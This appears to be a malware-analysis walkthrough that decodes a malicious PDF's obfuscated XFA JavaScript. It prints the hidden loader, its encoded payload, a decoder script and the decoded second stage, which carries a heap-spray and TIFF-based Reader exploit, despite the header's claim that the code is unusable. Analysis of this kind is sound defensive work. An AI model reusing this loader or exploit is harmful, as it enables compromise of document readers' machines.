- //=========================================
- // #MalwareMustDie | @unixfreaxjp ~]$ date
- // Mon Nov 26 16:35:46 JST 2012
- //
- // Step-by-step guide to analysing a malicious PDF: infector2.pdf
- // With the decoding explained step by step
- // As found in the case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
- // Target is uploaded to VT at: https://www.virustotal.com/file/f3880c001bf094902f8a0a76e55cacd18555fe593dbe463f4aca9b4ad7050310/analysis/
- // *) the material contains dangerous code, but it is shown hex-encoded so it cannot be used as-is.
- //=========================================
- ================================
- CONFIRMING THE OBJECT
- ; Make sure we can spot the suspicious
- ; object like JS or JavaScript..
- =================================
- // I always confirm it with the below
- PDFiD 0.0.11 ./infector2.pdf
- PDF Header: %PDF-1.6
- obj 27
- endobj 27
- stream 13
- endstream 12
- xref 2
- trailer 2
- startxref 0
- /Page 2
- /Encrypt 0
- /ObjStm 0 // now the usual suspects...
- /JS 0 // <======== zero here...
- /JavaScript 0 // <=========== ...and zero here. PDFiD only counts these name keywords;
- /AA 0
- /OpenAction 0
- /AcroForm 1 // <== ...and this is where the script really lives, in the XFA form packet (see the <xfa:script> element below), so a zero /JS count is not a clean bill of health
- /JBIG2Decode 0
- /RichMedia 0
- /Launch 0
- /Colors > 2^24 0
- %%EOF 1
- After last %%EOF 0
- Total entropy: 6.410619 ( 14769 bytes)
- Entropy inside streams: 7.874169 ( 3783 bytes) // close to the maximum of 8: the streams are compressed/encoded, inflate them before hunting for strings
- Entropy outside streams: 5.203651 ( 10986 bytes)
- 0000 25 50 44 46 2D 31 2E 36 0D 25 E2 E3 CF D3 0D 0A %PDF-1.6.%......
- 0010 35 32 20 30 20 6F 62 6A 3C 3C 2F 4C 65 6E 67 74 52 0 obj<</Lengt
- 0020 68 20 36 36 33 32 32 2F 52 6F 6F 74 20 31 20 30 h 66322/Root 1 0
- 0030 20 52 2F 49 6E 66 6F 20 33 20 30 20 52 25 2F 46 R/Info 3 0 R%/F
- 0040 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 6F 64 ilter/FlateDecod
- 0050 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 65 78 e/W[1 2 1]/Index
- 0060 5B 35 20 31 20 37 20 31 20 39 20 34 20 32 33 20 [5 1 7 1 9 4 23
- 0070 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 6D 0D 4 50 3]>>stream.
- 0080 2F 46 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 /Filter/FlateDec
- 0090 6F 64 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 ode/W[1 2 1]/Ind
- 00A0 65 78 5B 35 20 31 20 37 20 31 20 39 20 34 20 32 ex[5 1 7 1 9 4 2
- 00B0 33 20 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 3 4 50 3]>>strea
- 00C0 6D 0D 78 DA 62 62 62 30 62 60 62 60 60 60 C4 47 m.x.bbb0b`b```.G
- 00D0 30 FE 02 12 FF D9 21 AC FF 0C 77 FF 33 31 30 5A 0.....!...w.310Z
- 00E0 83 B4 F5 32 00 04 18 00 77 1F 06 F5 0D 0A 65 6E ...2....w.....en
- 00F0 64 73 74 72 65 61 6D 0D 65 6E 64 6F 62 6A 0D 31 dstream.endobj.1
- 0100 20 30 20 6F 62 6A 3C 3C 2F 4D 61 72 6B 49 6E 66 0 obj<</MarkInf
- : : :
- // Note the '%' right after "/Info 3 0 R" in object 52: in PDF syntax it starts a comment that
- // runs to end of line, so a parser ignores the first "/Filter...>>stream" and reads the repeated
- // dictionary on the next line instead. That commented-out "stream" keyword is also the likely
- // reason PDFiD counts 13 "stream" against 12 "endstream".
- ================================
- DETECTING JAVASCRIPT
- ; Check the location of the JS first.
- ; Note: there is a possibility of
- ; a scattered script, so read it well..
- ; My recommendation is to look at all the strings, or
- ; use a hex editor to find the offset
- ; of the script.
- ================================
- // at file offset 0x2EBC-0x32E5 there is JS code, inside an XFA script element
- // (this is why the /JS and /JavaScript counts from PDFiD above were zero):
- <xfa:script contentType='application/x-javascript'>
- /*
- */
- with(event){
- l="l";
- ev=/*ewbwf*/"eva"/*/renyaerz*/;
- t=target;
- aa=/*/gbergern*/'co'+'de]';
- ind="indexOf";
- if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
- a=/**/t.creationDate.split('|')[0].substr(13);
- }
- s="";
- p=k("pars"+"eInt");
- z=a;
- e="de";
- ll="length";
- ss=/*bgre*/k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff/*x*/+e];
- xz=a.length;
- for(i=0;i<xz;i+=2){
- if (z[i]=='-')continue;
- s=s+(ss(p(z[i]+z[i+1],0x1a)));
- }
- zx=k;
- zx(s);
- </xfa:script>
- =================================
- DECODING PREPARATION
- =================================
- // As before, strip the PDF/XFA tags. This is the loader that decodes the obfuscated data;
- // the script tries to fool scanners by sprinkling /* comments */ through every expression,
- // so just remove them and lay it out like this:
- with(event)
- {
- l="l";
- ev="eva";
- t=target;                 // the XFA field that fired the event
- aa='co'+'de]';
- ind="indexOf";
- // Reader check: app.setProfile must be a native Acrobat method, i.e. its string form
- // contains "[native code]". Emulators that stub app.* with plain JS functions never set k.
- if(app.setProfile)if((app.setProfile+"asvfa")[ind](aa)!=-1)
- {
- k=t[ev+l];                // k = target["eval"]
- }
- a=t.creationDate.split('|')[0].substr(13);   // first '|'-separated array, minus a 13-char junk prefix
- }
- s="";
- p=k("pars"+"eInt");       // p = parseInt
- z=a;
- e="de";
- ll="length";
- ss=k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff+e];              // ss = String.fromCharCode
- xz=a.length;
- for(i=0;i<xz;i+=2)
- {
- if (z[i]=='-')continue;                // '-' AND the character after it are filler (continue still adds 2 to i)
- s=s+(ss(p(z[i]+z[i+1],0x1a)));         // each two-char group is a base-26 number -> one character
- }
- zx=k;
- zx(s);                    // eval the decoded second stage
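- // Added example (our code, not part of the sample): the loader's loop re-implemented in
- // Node.js so the /CreationDate blob can be decoded offline, without Acrobat and without ever
- // calling eval(). It goes one step beyond the loop above and handles the whole /CreationDate
- // value, i.e. both '|'-separated arrays. The 13-character prefix and the first 42 characters
- // of the array are taken from the dump further down; the second array in the sample is made up.

```javascript
// Added example, not code from the sample: the loader's decoding loop re-implemented
// so the /CreationDate blob can be decoded offline, without Acrobat and without eval().
// What the loader does inside Reader:
//   a = target.creationDate.split('|')[0].substr(13);
//   for (i = 0; i < a.length; i += 2) {
//     if (a[i] == '-') continue;        // skips '-' AND the character after it
//     s += String.fromCharCode(parseInt(a[i] + a[i + 1], 0x1a));
//   }
//   eval(s);

const JUNK_PREFIX_LEN = 13; // the "%#^&*%^#@&%#@" run the loader drops with substr(13)

// Decode one '|'-delimited array: two-char base-26 groups, '-' plus one filler char skipped.
function decodeBase26Pairs(blob) {
  let out = '';
  for (let i = 0; i < blob.length; i += 2) {
    if (blob[i] === '-') continue;          // '-' and blob[i + 1] are filler
    const code = parseInt(blob[i] + blob[i + 1], 26);
    if (Number.isNaN(code)) break;          // tolerate a truncated tail instead of emitting NaN chars
    out += String.fromCharCode(code);
  }
  return out;
}

// Decode the whole /CreationDate value: stage 1 is the base-26 script, stage 2 is the hex
// shellcode that the stage-1 script later reads as split('|')[1].replace(/;/g, '').
function decodeCreationDate(creationDate) {
  const parts = creationDate.split('|');
  return {
    stage1: decodeBase26Pairs(parts[0].slice(JUNK_PREFIX_LEN)),
    stage2: (parts[1] || '').replace(/;/g, ''),
  };
}

// Constructed sample: the real 13-char prefix and the first 42 characters of the real array
// (both from the dump), plus a made-up second array with ';' separators.
const SAMPLE = '%#^&*%^#@&%#@' + '3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C' + '|' + '66;83;e4;fc';

const decoded = decodeCreationDate(SAMPLE);
console.log(JSON.stringify(decoded)); // print, never eval, whatever comes out
```

- // Run it with node. Feed decodeCreationDate() the full /CreationDate string from the dump and
- // stage1 is the condensed script shown further down, stage2 the shellcode hex; read it, do not run it.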
- ===============================
- FIND THE OBFUSCATION DATA
- ; again... it may be scattered,
- ; pls be sure/careful
- =================================
- // the loader reads its data from t.creationDate, i.e. the /CreationDate entry of the Info
- // dictionary, so let's grep the strings for it :-)
- // we find the data at offset 0x1A1C, as below:
- <<
- /Title(asdasdsad)/CreationDate(%#^&*%^#@&%#@3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-6484414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-54
4241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-42
91O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27|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)
- >>
- ====================================
- ANALYZING THE PATTERN OF THE
- OBFUSCATION DATA
- ; in an obfuscated JS infector it has to be
- ; a generator, or shellcode, or
- ; maybe exploit strings...
- ; the set of characters used and where the
- ; data comes from make the pattern easy to recognise and
- ; help us analyze further
- =====================================
- // Again, look at the data pattern first. There are two patterns. The one below, a long one,
- // tells me this is obfuscated code: two-character groups, a '-' every ten characters, and only
- // the digits plus the letters A-P, i.e. a radix-26 alphabet.
- 148481K3J-8443N4A4C-8293N4E3N-4464C1K4C
- 33P1I1D1D-31F274E3J-04A16483J-53M3M4146
- 248474146-84C3N4A4B-93H3J1I16-041274E3J
- 71N291820-03L1O1M22-81M1M3O1M-7211N2324
- 81N201N20-41N201N1O-1221M1M1M-91M1M1M1M
- 11M1M1M20-61N201N20-81N201N20-01N201N20
- 71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D
- // and this one, by experience, tells me it is shellcode: hex digits only, and the x86 byte patterns are familiar...
- 683e4fcfc85e47534e95f33c0648b40308b40
- b762003f533c94941fcad03c533db0fbe1038
- 396ebf38b68088bf76a0559e898ffffffe2f9
- 281ec040100008d5c240cc7042472656773c7
- 41d0441516a006a0053576a00ff561485c075
- // Then see the code here:
- //
- // a=t.creationDate.split('|')[0].substr(13);
- //
- // So let's reverse it, working from right to left:
- // substr(13) = drop the first 13 characters (the "%#^&*%^#@&%#@" junk at the front),
- // [0] = take the first element,
- // t.creationDate.split('|') = split the /CreationDate string on "|" into an array.
- // So the value of "a" becomes the first of the two groups of data below:
- 3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-64844414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-24424
1K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H
293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27
- // and next one is....
- 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
- // So put the FIRST array above (and only that) into the variable a, and run the rest of the script (below):
- s="";
- p=k("pars"+"eInt");
- z=a;
- e="de";
- ll="length";
- ss=k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff+e];
- xz=a.length;
- for(i=0;i<xz;i+=2)
- {
- if (z[i]=='-')continue;
- s=s+(ss(p(z[i]+z[i+1],0x1a)));
- }
- // zx=k; <-- we don't need this mumbo jumbo;
- // zx(s); instead just dump the s variable, as below:
- eval (s); // or better ==> document.write(s); / console.log(s): the second stage only works inside Acrobat (it needs app and event), but the safe habit is to print it, never run it
- // it will give us two eval() values,
- // one is ..... just ignore it...
- // and the other is the condensed code below:
- app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb,ccc,ddd,eee,fff,ggg,hhh;var pointers_a,i;var x=new Array();var y=new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0;i<400;i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c)}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8)}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function 
_j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
- // Beautified for reading, as below (the regex is /;/g as in the original, with no space): ;-)
